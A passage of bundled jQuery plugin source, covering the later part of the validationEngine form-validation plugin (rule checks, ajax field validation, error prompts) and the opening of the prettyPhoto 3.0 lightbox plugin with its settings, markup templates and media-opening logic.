                        options.onAjaxFormComplete(!errorInForm, form, json, options);
                    } else
                        options.onAjaxFormComplete(true, form, "", options);
                }
            });

        },
        /**
         * Validates field, shows prompts accordingly
         *
         * @param {jqObject}
         *            field
         * @param {Array[String]}
         *            field's validation rules
         * @param {Map}
         *            user options
         * @return true if field is valid
         */
        _validateField: function(field, options, skipAjaxValidation) {
            if (!field.attr("id"))
                $.error("jQueryValidate: an ID attribute is required for this field: " + field.attr("name") + " class:" +
                field.attr("class"));

            var rulesParsing = field.attr('class');
            var getRules = /validate\[(.*)\]/.exec(rulesParsing);
            if (!getRules)
                return false;
            var str = getRules[1];
            var rules = str.split(/\[|,|\]/);

            // true if we ran the ajax validation, tells the logic to stop messing with prompts
            var isAjaxValidator = false;
            var fieldName = field.attr("name");
            var promptText = "";
			var required = false;
            options.isError = false;
            options.showArrow = true;

            for (var i = 0; i < rules.length; i++) {

                var errorMsg = undefined;
                switch (rules[i]) {

                    case "required":
                        required = true;
                        errorMsg = methods._required(field, rules, i, options);
                        break;
                    case "custom":
                        errorMsg = methods._customRegex(field, rules, i, options);
                        break;
                    case "ajax":
                        // ajax has its own prompts handling technique
						if(!skipAjaxValidation){
							methods._ajax(field, rules, i, options);
	                        isAjaxValidator = true;
						}
                        break;
                    case "minSize":
                        errorMsg = methods._minSize(field, rules, i, options);
                        break;
                    case "maxSize":
                        errorMsg = methods._maxSize(field, rules, i, options);
                        break;
                    case "min":
                        errorMsg = methods._min(field, rules, i, options);
                        break;
                    case "max":
                        errorMsg = methods._max(field, rules, i, options);
                        break;
                    case "past":
                        errorMsg = methods._past(field, rules, i, options);
                        break;
                    case "future":
                        errorMsg = methods._future(field, rules, i, options);
                        break;
                    case "maxCheckbox":
                        errorMsg = methods._maxCheckbox(field, rules, i, options);
                        field = $($("input[name='" + fieldName + "']"));
                        break;
                    case "minCheckbox":
                        errorMsg = methods._minCheckbox(field, rules, i, options);
                        field = $($("input[name='" + fieldName + "']"));
                        break;
                    case "equals":
                        errorMsg = methods._equals(field, rules, i, options);
                        break;
                    case "funcCall":
                        errorMsg = methods._funcCall(field, rules, i, options);
                        break;

                    default:
                    //$.error("jQueryValidator rule not found"+rules[i]);
                }
                if (errorMsg !== undefined) {
                    promptText += errorMsg + "<br/>";
                    options.isError = true;
					
                }

            }
            // If the rules required is not added, an empty field is not validated
            if(!required){
            	if(field.val() == "") options.isError = false;
            }
            // Hack for radio/checkbox group button, the validation go into the
            // first radio/checkbox of the group
            var fieldType = field.attr("type");

            if ((fieldType == "radio" || fieldType == "checkbox") && $("input[name='" + fieldName + "']").size() > 1) {
                field = $($("input[name='" + fieldName + "'][type!=hidden]:first"));
                options.showArrow = false;
            }

            if (options.isError){
				
                methods._showPrompt(field, promptText, "", false, options);
            }else{
				if (!isAjaxValidator) methods._closePrompt(field);
			}
			field.trigger("jqv.field.result", [field, options.isError, promptText]);
            return options.isError;
        },
        /**
         * Required validation
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _required: function(field, rules, i, options) {
            switch (field.attr("type")) {
                case "text":
                case "password":
                case "textarea":
                case "file":
                default:
                    if (!field.val())
                        return options.allrules[rules[i]].alertText;
                    break;
                case "radio":
                case "checkbox":
                    var name = field.attr("name");
                    if ($("input[name='" + name + "']:checked").size() == 0) {

                        if ($("input[name='" + name + "']").size() == 1)
                            return options.allrules[rules[i]].alertTextCheckboxe;
                        else
                            return options.allrules[rules[i]].alertTextCheckboxMultiple;
                    }
                    break;
                // required for <select>
                case "select-one":
                    // added by paul@kinetek.net for select boxes, Thank you
                    if (!field.val())
                        return options.allrules[rules[i]].alertText;
                    break;
                case "select-multiple":
                    // added by paul@kinetek.net for select boxes, Thank you
                    if (!field.find("option:selected").val())
                        return options.allrules[rules[i]].alertText;
                    break;
            }
        },
        /**
         * Validate Regex rules
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _customRegex: function(field, rules, i, options) {
            var customRule = rules[i + 1];
			var rule = options.allrules[customRule];
			if(!rule) {
				alert("jqv:custom rule not found "+customRule);
				return;
			}
			
			var ex=rule.regex;
			if(!ex) {
				alert("jqv:custom regex not found "+customRule);
				return;
			}
            var pattern = new RegExp(ex);

            if (!pattern.test(field.val()))
                return options.allrules[customRule].alertText;
        },
        /**
         * Validate custom function outside of the engine scope
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _funcCall: function(field, rules, i, options) {
            var functionName = rules[i + 1];
            var fn = window[functionName];
            if (typeof(fn) == 'function')
                return fn(field, rules, i, options);

        },
        /**
         * Field match
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _equals: function(field, rules, i, options) {
            var equalsField = rules[i + 1];

            if (field.val() != $("#" + equalsField).val())
                return options.allrules.equals.alertText;
        },
        /**
         * Check the maximum size (in characters)
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _maxSize: function(field, rules, i, options) {
            var max = rules[i + 1];
            var len = field.val().length;

            if (len > max) {
                var rule = options.allrules.maxSize;
                return rule.alertText + max + rule.alertText2;
            }
        },
        /**
         * Check the minimum size (in characters)
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _minSize: function(field, rules, i, options) {
            var min = rules[i + 1];
            var len = field.val().length;

            if (len < min) {
                var rule = options.allrules.minSize;
                return rule.alertText + min + rule.alertText2;
            }
        },
        /**
         * Check number minimum value
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _min: function(field, rules, i, options) {
            var min = parseFloat(rules[i + 1]);
            var len = parseFloat(field.val());

            if (len < min) {
                var rule = options.allrules.min;
                if (rule.alertText2) return rule.alertText + min + rule.alertText2;
                return rule.alertText + min;
            }
        },
        /**
         * Check number maximum value
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _max: function(field, rules, i, options) {
            var max = parseFloat(rules[i + 1]);
            var len = parseFloat(field.val());

            if (len >max ) {
                var rule = options.allrules.max;
                if (rule.alertText2) return rule.alertText + max + rule.alertText2;
                //orefalo: to review, also do the translations
                return rule.alertText + max;
            }
        },
        /**
         * Checks date is in the past
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _past: function(field, rules, i, options) {

            var p=rules[i + 1];
            var pdate = (p.toLowerCase() == "now")? new Date():methods._parseDate(p);
            var vdate = methods._parseDate(field.val());

            if (vdate < pdate ) {
                var rule = options.allrules.past;
                if (rule.alertText2) return rule.alertText + methods._dateToString(pdate) + rule.alertText2;
                return rule.alertText + methods._dateToString(pdate);
            }
        },
        /**
         * Checks date is in the future
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _future: function(field, rules, i, options) {

            var p=rules[i + 1];
            var pdate = (p.toLowerCase() == "now")? new Date():methods._parseDate(p);
            var vdate = methods._parseDate(field.val());

            if (vdate > pdate ) {
                var rule = options.allrules.future;
                if (rule.alertText2) return rule.alertText + methods._dateToString(pdate) + rule.alertText2;
                return rule.alertText + methods._dateToString(pdate);
            }
        },
        /**
         * Max number of checkbox selected
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _maxCheckbox: function(field, rules, i, options) {

            var nbCheck = rules[i + 1];
            var groupname = field.attr("name");
            var groupSize = $("input[name='" + groupname + "']:checked").size();
            if (groupSize > nbCheck) {
                options.showArrow = false;
                if (options.allrules.maxCheckbox.alertText2) return options.allrules.maxCheckbox.alertText + " " + nbCheck + " " + options.allrules.maxCheckbox.alertText2;
                return options.allrules.maxCheckbox.alertText;
            }
        },
        /**
         * Min number of checkbox selected
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return an error string if validation failed
         */
        _minCheckbox: function(field, rules, i, options) {

            var nbCheck = rules[i + 1];
            var groupname = field.attr("name");
            var groupSize = $("input[name='" + groupname + "']:checked").size();
            if (groupSize < nbCheck) {
                options.showArrow = false;
                return options.allrules.minCheckbox.alertText + " " + nbCheck + " " +
                options.allrules.minCheckbox.alertText2;
            }
        },
        /**
         * Ajax field validation
         *
         * @param {jqObject} field
         * @param {Array[String]} rules
         * @param {int} i rules index
         * @param {Map}
         *            user options
         * @return nothing! the ajax validator handles the prompts itself
         */
        _ajax: function(field, rules, i, options) {
			
			
            var errorSelector = rules[i + 1];
            var rule = options.allrules[errorSelector];
            var extraData = rule.extraData;
            var extraDataDynamic = rule.extraDataDynamic;

            if (!extraData)
                extraData = "";

            if (extraDataDynamic) {
              var tmpData = [];
              var domIds = String(extraDataDynamic).split(",");
              for (var i = 0; i < domIds.length; i++) {
                var id = domIds[i];
                if ($(id).length) {
                  var inputValue = field.closest("form").find(id).val();
                  var keyValue = id.replace('#', '') + '=' + escape(inputValue);
                  tmpData.push(keyValue);
                }
              }
              extraDataDynamic = tmpData.join("&");
            } else {
              extraDataDynamic = "";              
            }
                                
            if (!options.isError) {
                $.ajax({
                    type: "GET",
                    url: rule.url,
                    cache: false,
                    dataType: "json",
                    data: "fieldId=" + field.attr("id") + "&fieldValue=" + field.val() + "&extraData=" + extraData + "&" + extraDataDynamic,
                    field: field,
                    rule: rule,
                    methods: methods,
                    options: options,
                    beforeSend: function() {
                        // build the loading prompt
                        var loadingText = rule.alertTextLoad;
                        if (loadingText)
                            methods._showPrompt(field, loadingText, "load", true, options);
                    },
                    error: function(data, transport) {
                        methods._ajaxError(data, transport);
                    },
                    success: function(json) {
						
                        // asynchronously called on success, data is the json answer from the server
                        var errorFieldId = json[0];
                        var errorField = $($("#" + errorFieldId)[0]);
                        // make sure we found the element
                        if (errorField.length == 1) {
                            var status = json[1];
							// read the optional msg from the server
							var msg = json[2];
                            if (!status) {
                                // Houston we got a problem - display an red prompt
                                options.ajaxValidCache[errorFieldId] = false;
                                options.isError = true;

								// resolve the msg prompt
								if(msg) {
									if (options.allrules[msg]) {
                                    	var txt = options.allrules[msg].alertText;
                                    	if (txt)
                                    		msg = txt;
                                    }
								}
								else
                                    msg = rule.alertText;
                                
								methods._showPrompt(errorField, msg, "", true, options);
                            } else {
                                if (options.ajaxValidCache[errorFieldId] !== undefined)
                                    options.ajaxValidCache[errorFieldId] = true;

                                // resolves the msg prompt
								if(msg) {
									if (options.allrules[msg]) {
							           	var txt = options.allrules[msg].alertTextOk;
							           	if (txt)
							           		msg = txt;
							        }
								}
								else
							       	msg = rule.alertTextOk;                                

								// see if we should display a green prompt
                                if (msg)
                                    methods._showPrompt(errorField, msg, "pass", true, options);
                                else
                                    methods._closePrompt(errorField);
                            }
                        }
                    }
                });
            }
        },
        /**
         * Common method to handle ajax errors
         *
         * @param {Object} data
         * @param {Object} transport
         */
        _ajaxError: function(data, transport) {
            if(data.status == 0 && transport == null)
                alert("The page is not served from a server! ajax call failed");
            else if(typeof console != "undefined")
                console.log("Ajax error: " + data.status + " " + transport);
        },
        /**
         * date -> string
         *
         * @param {Object} date
         */
        _dateToString: function(date) {

            return date.getFullYear()+"-"+(date.getMonth()+1)+"-"+date.getDate();
        },
        /**
         * Parses an ISO date
         * @param {String} d
         */
        _parseDate: function(d) {

            var dateParts = d.split("-");
            if(dateParts==d)
                dateParts = d.split("/");
            return new Date(dateParts[0], (dateParts[1] - 1) ,dateParts[2]);
        },
        /**
         * Builds or updates a prompt with the given information
         *
         * @param {jqObject} field
         * @param {String} promptText html text to display type
         * @param {String} type the type of bubble: 'pass' (green), 'load' (black) anything else (red)
         * @param {boolean} ajaxed - use to mark fields than being validated with ajax
         * @param {Map} options user options
         */
        _showPrompt: function(field, promptText, type, ajaxed, options, ajaxform) {
            var prompt = methods._getPrompt(field);
			// The ajax submit errors are not see has an error in the form,
			// When the form errors are returned, the engine see 2 bubbles, but those are ebing closed by the engine at the same time
			// Because no error was found befor submitting
			if(ajaxform) prompt = false;
            if (prompt)
                methods._updatePrompt(field, prompt, promptText, type, ajaxed, options);
            else
                methods._buildPrompt(field, promptText, type, ajaxed, options);
        },
        /**
         * Builds and shades a prompt for the given field.
         *
         * @param {jqObject} field
         * @param {String} promptText html text to display type
         * @param {String} type the type of bubble: 'pass' (green), 'load' (black) anything else (red)
         * @param {boolean} ajaxed - use to mark fields than being validated with ajax
         * @param {Map} options user options
         */
        _buildPrompt: function(field, promptText, type, ajaxed, options) {

            // create the prompt
            var prompt = $('<div>');
            prompt.addClass(methods._getClassName(field.attr("id")) + "formError");
            // add a class name to identify the parent form of the prompt
            if(field.is(":input")) prompt.addClass("parentForm"+methods._getClassName(field.parents('form').attr("id")));
            prompt.addClass("formError");

            switch (type) {
                case "pass":
                    prompt.addClass("greenPopup");
                    break;
                case "load":
                    prompt.addClass("blackPopup");
            }
            if (ajaxed)
                prompt.addClass("ajaxed");

            // create the prompt content
            var promptContent = $('<div>').addClass("formErrorContent").html(promptText).appendTo(prompt);
            // create the css arrow pointing at the field
            // note that there is no triangle on max-checkbox and radio
            if (options.showArrow) {
                var arrow = $('<div>').addClass("formErrorArrow");

                switch (options.promptPosition) {
                    case "bottomLeft":
                    case "bottomRight":
                        prompt.find(".formErrorContent").before(arrow);
                        arrow.addClass("formErrorArrowBottom").html('<div class="line1"><!-- --></div><div class="line2"><!-- --></div><div class="line3"><!-- --></div><div class="line4"><!-- --></div><div class="line5"><!-- --></div><div class="line6"><!-- --></div><div class="line7"><!-- --></div><div class="line8"><!-- --></div><div class="line9"><!-- --></div><div class="line10"><!-- --></div>');
                        break;
                    case "topLeft":
                    case "topRight":
                        arrow.html('<div class="line10"><!-- --></div><div class="line9"><!-- --></div><div class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- --></div><div class="line5"><!-- --></div><div class="line4"><!-- --></div><div class="line3"><!-- --></div><div class="line2"><!-- --></div><div class="line1"><!-- --></div>');
                        prompt.append(arrow);
                        break;
                }
            }

            //Cedric: Needed if a container is in position:relative
            // insert prompt in the form or in the overflown container?
            if (options.isOverflown)
            	field.before(prompt);
            else
               $("body").append(prompt);

            var pos = methods._calculatePosition(field, prompt, options);
            prompt.css({
                "top": pos.callerTopPosition,
                "left": pos.callerleftPosition,
                "marginTop": pos.marginTopSize,
                "opacity": 0
            });

            return prompt.animate({
                "opacity": 0.87
            });

        },
        /**
         * Updates the prompt text field - the field for which the prompt
         * @param {jqObject} field
         * @param {String} promptText html text to display type
         * @param {String} type the type of bubble: 'pass' (green), 'load' (black) anything else (red)
         * @param {boolean} ajaxed - use to mark fields than being validated with ajax
         * @param {Map} options user options
         */
        _updatePrompt: function(field, prompt, promptText, type, ajaxed, options) {
			
            if (prompt) {
                if (type == "pass")
                    prompt.addClass("greenPopup");
                else
                    prompt.removeClass("greenPopup");

                if (type == "load")
                    prompt.addClass("blackPopup");
                else
                    prompt.removeClass("blackPopup");

                if (ajaxed)
                    prompt.addClass("ajaxed");
                else
                    prompt.removeClass("ajaxed");

                prompt.find(".formErrorContent").html(promptText);

                var pos = methods._calculatePosition(field, prompt, options);
                prompt.animate({
                    "top": pos.callerTopPosition,
                    "marginTop": pos.marginTopSize
                });
            }
        },
        /**
         * Closes the prompt associated with the given field
         *
         * @param {jqObject}
         *            field
         */
        _closePrompt: function(field) {

            var prompt = methods._getPrompt(field);
            if (prompt)
                prompt.fadeTo("fast", 0, function() {
                    prompt.remove();
                });
        },
        closePrompt: function(field) {
            return methods._closePrompt(field);
        },
        /**
         * Returns the error prompt matching the field if any
         *
         * @param {jqObject}
         *            field
         * @return undefined or the error prompt (jqObject)
         */
        _getPrompt: function(field) {

            var className = "." + methods._getClassName(field.attr("id")) + "formError";
            var match = $(className)[0];
            if (match)
                return $(match);
        },
        /**
         * Calculates prompt position
         *
         * @param {jqObject}
         *            field
         * @param {jqObject}
         *            the prompt
         * @param {Map}
         *            options
         * @return positions
         */
        _calculatePosition: function(field, promptElmt, options) {

            var promptTopPosition, promptleftPosition, marginTopSize;
            var fieldWidth = field.width();
            var promptHeight = promptElmt.height();

            var overflow = options.isOverflown;
            if (overflow) {
                // is the form contained in an overflown container?
                promptTopPosition = promptleftPosition = 0;
                // compensation for the arrow
                marginTopSize = -promptHeight;
            } else {
                var offset = field.offset();
                promptTopPosition = offset.top;
                promptleftPosition = offset.left;
                marginTopSize = 0;
            }

            switch (options.promptPosition) {

                default:
                case "topRight":
                    if (overflow)
                        // Is the form contained in an overflown container?
                        promptleftPosition += fieldWidth - 30;
                    else {
                        promptleftPosition += fieldWidth - 30;
                        promptTopPosition += -promptHeight;
                    }
                    break;
                case "topLeft":
                    promptTopPosition += -promptHeight - 10;
                    break;
                case "centerRight":
                    promptleftPosition += fieldWidth + 13;
                    break;
                case "bottomLeft":
                    promptTopPosition = promptTopPosition + field.height() + 15;
                    break;
                case "bottomRight":
                    promptleftPosition += fieldWidth - 30;
                    promptTopPosition += field.height() + 5;
            }

            return {
                "callerTopPosition": promptTopPosition + "px",
                "callerleftPosition": promptleftPosition + "px",
                "marginTopSize": marginTopSize + "px"
            };
        },
        /**
         * Saves the user options and variables in the form.data
         *
         * @param {jqObject}
         *            form - the form where the user option should be saved
         * @param {Map}
         *            options - the user options
         * @return the user options (extended from the defaults)
         */
        _saveOptions: function(form, options) {

            // is there a language localisation ?
            if ($.validationEngineLanguage)
                var allRules = $.validationEngineLanguage.allRules;
            else
                $.error("jQuery.validationEngine rules are not loaded, plz add localization files to the page");

            var userOptions = $.extend({

                // Name of the event triggering field validation
                validationEventTrigger: "blur",
                // Automatically scroll viewport to the first error
                scroll: true,
                // Opening box position, possible locations are: topLeft,
                // topRight, bottomLeft, centerRight, bottomRight
                promptPosition: "topRight",
                bindMethod:"bind",
				// internal, automatically set to true when it parse a _ajax rule
				inlineAjax: false,
                // if set to true, the form data is sent asynchronously via ajax to the form.action url (get)
                ajaxFormValidation: false,
                // Ajax form validation callback method: boolean onComplete(form, status, errors, options)
                // retuns false if the form.submit event needs to be canceled.
				ajaxFormValidationURL: false,
                // The url to send the submit ajax validation (default to action)
                onAjaxFormComplete: $.noop,
                // called right before the ajax call, may return false to cancel
                onBeforeAjaxFormValidation: $.noop,
                // Stops form from submitting and execute function assiciated with it
                onValidationComplete: false,

                // Used when the form is displayed within a scrolling DIV
                isOverflown: false,
                overflownDIV: "",

                // --- Internals DO NOT TOUCH or OVERLOAD ---
                // validation rules and i18
                allrules: allRules,
                // true when form and fields are binded
                binded: false,
                // set to true, when the prompt arrow needs to be displayed
                showArrow: true,
                // did one of the validation fail ? kept global to stop further ajax validations
                isError: false,
                // Caches field validation status, typically only bad status are created.
                // the array is used during ajax form validation to detect issues early and prevent an expensive submit
                ajaxValidCache: {}

            }, options);

            form.data('jqv', userOptions);
            return userOptions;
        },
        
        /**
         * Removes forbidden characters from class name
         * @param {String} className
         */
        _getClassName: function(className) {
        	return className.replace(":","_").replace(".","_");
        }
    };

    /**
     * Plugin entry point.
     * You may pass an action as a parameter or a list of options.
     * if none, the init and attach methods are being called.
     * Remember: if you pass options, the attached method is NOT called automatically
     *
     * @param {String}
     *            method (optional) action
     */
    $.fn.validationEngine = function(method) {

        var form = $(this);
		  if(!form[0]) return false;  // stop here if the form does not exist
		  
        if (typeof(method) == 'string' && method.charAt(0) != '_' && methods[method]) {

            // make sure init is called once
            if(method != "showPrompt" && method != "hidePrompt" && method != "hide" && method != "hideAll") 
            	methods.init.apply(form);
             
            return methods[method].apply(form, Array.prototype.slice.call(arguments, 1));
        } else if (typeof method == 'object' || !method) {
            // default constructor with or without arguments
			methods.init.apply(form, arguments);
            return methods.attach.apply(form);
        } else {
            $.error('Method ' + method + ' does not exist in jQuery.validationEngine');
        }
    };
})(jQuery);

/* ------------------------------------------------------------------------
	Class: prettyPhoto
	Use: Lightbox clone for jQuery
	Author: Stephane Caron (http://www.no-margin-for-errors.com)
	Version: 3.0
------------------------------------------------------------------------- */

(function($) {
	$.prettyPhoto = {version: '3.0'};
	
	
	$.fn.prettyPhoto = function(pp_settings) {
		pp_settings = jQuery.extend({
			animation_speed: 'fast', /* fast/slow/normal */
			slideshow: false, /* false OR interval time in ms */
			autoplay_slideshow: false, /* true/false */
			opacity: 0.80, /* Value between 0 and 1 */
			show_title: false, /* true/false */
			allow_resize: true, /* Resize the photos bigger than viewport. true/false */
			default_width: 500,
			default_height: 344,
			counter_separator_label: '/', /* The separator for the gallery counter 1 "of" 2 */
			theme: 'facebook', /* light_rounded / dark_rounded / light_square / dark_square / facebook */
			hideflash: false, /* Hides all the flash object on a page, set to TRUE if flash appears over prettyPhoto */
			wmode: 'opaque', /* Set the flash wmode attribute */
			autoplay: true, /* Automatically start videos: True/False */
			modal: false, /* If set to true, only the close button will close the window */
			overlay_gallery: true, /* If set to true, a gallery will overlay the fullscreen image on mouse over */
			keyboard_shortcuts: true, /* Set to false if you open forms inside prettyPhoto */
			changepicturecallback: function(){}, /* Called everytime an item is shown/changed */
			callback: function(){}, /* Called when prettyPhoto is closed */
			markup: '<div class="pp_pic_holder"> \
						<div class="ppt">&nbsp;</div> \
						<div class="pp_top"> \
							<div class="pp_left"></div> \
							<div class="pp_middle"></div> \
							<div class="pp_right"></div> \
						</div> \
						<div class="pp_content_container"> \
							<div class="pp_left"> \
							<div class="pp_right"> \
								<div class="pp_content"> \
									<div class="pp_loaderIcon"></div> \
									<div class="pp_fade"> \
										<a href="#" class="pp_expand" title="Expand the image">Expand</a> \
										<div class="pp_hoverContainer"> \
											<a class="pp_next" href="#">next</a> \
											<a class="pp_previous" href="#">previous</a> \
										</div> \
										<div id="pp_full_res"></div> \
										<div class="pp_details clearfix"> \
											<p class="pp_description"></p> \
											<a class="pp_close" href="#">Close</a> \
											<div class="pp_nav"> \
												<a href="#" class="pp_arrow_previous">Previous</a> \
												<p class="currentTextHolder">0/0</p> \
												<a href="#" class="pp_arrow_next">Next</a> \
											</div> \
										</div> \
									</div> \
								</div> \
							</div> \
							</div> \
						</div> \
						<div class="pp_bottom"> \
							<div class="pp_left"></div> \
							<div class="pp_middle"></div> \
							<div class="pp_right"></div> \
						</div> \
					</div> \
					<div class="pp_overlay"></div>',
			gallery_markup: '<div class="pp_gallery"> \
								<a href="#" class="pp_arrow_previous">Previous</a> \
								<ul> \
									{gallery} \
								</ul> \
								<a href="#" class="pp_arrow_next">Next</a> \
							</div>',
			image_markup: '<img id="fullResImage" src="" />',
			flash_markup: '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="{width}" height="{height}"><param name="wmode" value="{wmode}" /><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="{path}" /><embed src="{path}" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="{width}" height="{height}" wmode="{wmode}"></embed></object>',
			quicktime_markup: '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="{height}" width="{width}"><param name="src" value="{path}"><param name="autoplay" value="{autoplay}"><param name="type" value="video/quicktime"><embed src="{path}" height="{height}" width="{width}" autoplay="{autoplay}" type="video/quicktime" pluginspage="http://www.apple.com/quicktime/download/"></embed></object>',
			iframe_markup: '<iframe src ="{path}" width="{width}" height="{height}" frameborder="no"></iframe>',
			inline_markup: '<div class="pp_inline clearfix">{content}</div>',
			custom_markup: ''
		}, pp_settings);
		
		// Global variables accessible only by prettyPhoto
		var matchedObjects = this, percentBased = false, correctSizes, pp_open,
		
		// prettyPhoto container specific
		pp_contentHeight, pp_contentWidth, pp_containerHeight, pp_containerWidth,
		
		// Window size
		windowHeight = $(window).height(), windowWidth = $(window).width(),

		// Global elements
		pp_slideshow;
		
		doresize = true, scroll_pos = _get_scroll();
	
		// Window/Keyboard events
		$(window).unbind('resize').resize(function(){ _center_overlay(); _resize_overlay(); });
		
		if(pp_settings.keyboard_shortcuts) {
			$(document).unbind('keydown').keydown(function(e){
				if(typeof $pp_pic_holder != 'undefined'){
					if($pp_pic_holder.is(':visible')){
						switch(e.keyCode){
							case 37:
								$.prettyPhoto.changePage('previous');
								break;
							case 39:
								$.prettyPhoto.changePage('next');
								break;
							case 27:
								if(!settings.modal)
								$.prettyPhoto.close();
								break;
						};
						return false;
					};
				};
			});
		}
		
		
		/**
		* Initialize prettyPhoto.
		*/
		$.prettyPhoto.initialize = function() {
			settings = pp_settings;
			
			if($.browser.msie && parseInt($.browser.version) == 6) settings.theme = "light_square"; // Fallback to a supported theme for IE6
			
			_buildOverlay(this); // Build the overlay {this} being the caller
			
			if(settings.allow_resize)
				$(window).scroll(function(){ _center_overlay(); });
				
			_center_overlay();
			
			set_position = jQuery.inArray($(this).attr('href'), pp_images); // Define where in the array the clicked item is positionned
			
			$.prettyPhoto.open();
			
			return false;
		}


		/**
		* Opens the prettyPhoto modal box.
		* @param image {String,Array} Full path to the image to be open, can also be an array containing full images paths.
		* @param title {String,Array} The title to be displayed with the picture, can also be an array containing all the titles.
		* @param description {String,Array} The description to be displayed with the picture, can also be an array containing all the descriptions.
		*/
		$.prettyPhoto.open = function() {
			if(typeof settings == "undefined"){ // Means it's an API call, need to manually get the settings and set the variables
				settings = pp_settings;
				if($.browser.msie && $.browser.version == 6) settings.theme = "light_square"; // Fallback to a supported theme for IE6
				_buildOverlay(this); // Build the overlay {this} being the caller
				pp_images = $.makeArray(arguments[0]);
				pp_titles = (arguments[1]) ? $.makeArray(arguments[1]) : $.makeArray("");
				pp_descriptions = (arguments[2]) ? $.makeArray(arguments[2]) : $.makeArray("");
				isSet = (pp_images.length > 1) ? true : false;
				set_position = 0;
			}

			if($.browser.msie && $.browser.version == 6) $('select').css('visibility','hidden'); // To fix the bug with IE select boxes
			
			if(settings.hideflash) $('object,embed').css('visibility','hidden'); // Hide the flash

			_checkPosition($(pp_images).size()); // Hide the next/previous links if on first or last images.
		
			$('.pp_loaderIcon').show();
		
			// Fade the content in
			if($ppt.is(':hidden')) $ppt.css('opacity',0).show();
			$pp_overlay.show().fadeTo(settings.animation_speed,settings.opacity);

			// Display the current position
			$pp_pic_holder.find('.currentTextHolder').text((set_position+1) + settings.counter_separator_label + $(pp_images).size());

			// Set the description
			$pp_pic_holder.find('.pp_description').show().html(unescape(pp_descriptions[set_position]));

			// Set the title
			(settings.show_title && pp_titles[set_position] != "") ? $ppt.html(unescape(pp_titles[set_position])) : $ppt.html('&nbsp;');
			
			// Get the dimensions
			movie_width = ( parseFloat(grab_param('width',pp_images[set_position])) ) ? grab_param('width',pp_images[set_position]) : settings.default_width.toString();
			movie_height = ( parseFloat(grab_param('height',pp_images[set_position])) ) ? grab_param('height',pp_images[set_position]) : settings.default_height.toString();
			
			// If the size is % based, calculate according to window dimensions
			if(movie_width.indexOf('%') != -1 || movie_height.indexOf('%') != -1){
				movie_height = parseFloat(($(window).height() * parseFloat(movie_height) / 100) - 150);
				movie_width = parseFloat(($(window).width() * parseFloat(movie_width) / 100) - 150);
				percentBased = true;
			}else{
				percentBased = false;
			}
			
			// Fade the holder
			$pp_pic_holder.fadeIn(function(){
				imgPreloader = "";
				
				// Inject the proper content
				switch(_getFileType(pp_images[set_position])){
					case 'image':
						imgPreloader = new Image();

						// Preload the neighbour images
						nextImage = new Image();
						if(isSet && set_position > $(pp_images).size()) nextImage.src = pp_images[set_position + 1];
						prevImage = new Image();
						if(isSet && pp_images[set_position - 1]) prevImage.src = pp_images[set_position - 1];

						$pp_pic_holder.find('#pp_full_res')[0].innerHTML = settings.image_markup;
						$pp_pic_holder.find('#fullResImage').attr('src',pp_images[set_position]);

						imgPreloader.onload = function(){
							// Fit item to viewport
							correctSizes = _fitToViewport(imgPreloader.width,imgPreloader.height);

							_showContent();
						};

						imgPreloader.onerror = function(){
							alert('Image cannot be loaded. Make sure the path is correct and image exist.');
							$.prettyPhoto.close();
						};
					
						imgPreloader.src = pp_images[set_position];
					break;
				
					case 'youtube':
						correctSizes = _fitToViewport(movie_width,movie_height); // Fit item to viewport

						movie = 'http://www.youtube.com/v/'+grab_param('v',pp_images[set_position]);
						if(settings.autoplay) movie += "&autoplay=1";
					
						toInject = settings.flash_markup.replace(/{width}/g,correctSizes['width']).replace(/{height}/g,correctSizes['height']).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,movie);
					break;
				
					case 'vimeo':
						correctSizes = _fitToViewport(movie_width,movie_height); // Fit item to viewport
					
						movie_id = pp_images[set_position];
						var regExp = /http:\/\/(www\.)?vimeo.com\/(\d+)/;
						var match = movie_id.match(regExp);
						
						movie = 'http://player.vimeo.com/video/'+ match[2] +'?title=0&amp;byline=0&amp;portrait=0';
						if(settings.autoplay) movie += "&autoplay=1;";
				
						vimeo_width = correctSizes['width'] + '/embed/?moog_width='+ correctSizes['width'];
				
						toInject = settings.iframe_markup.replace(/{width}/g,vimeo_width).replace(/{height}/g,correctSizes['height']).replace(/{path}/g,movie);
					break;
				
					case 'quicktime':
						correctSizes = _fitToViewport(movie_width,movie_height); // Fit item to viewport
						correctSizes['height']+=15; correctSizes['contentHeight']+=15; correctSizes['containerHeight']+=15; // Add space for the control bar
				
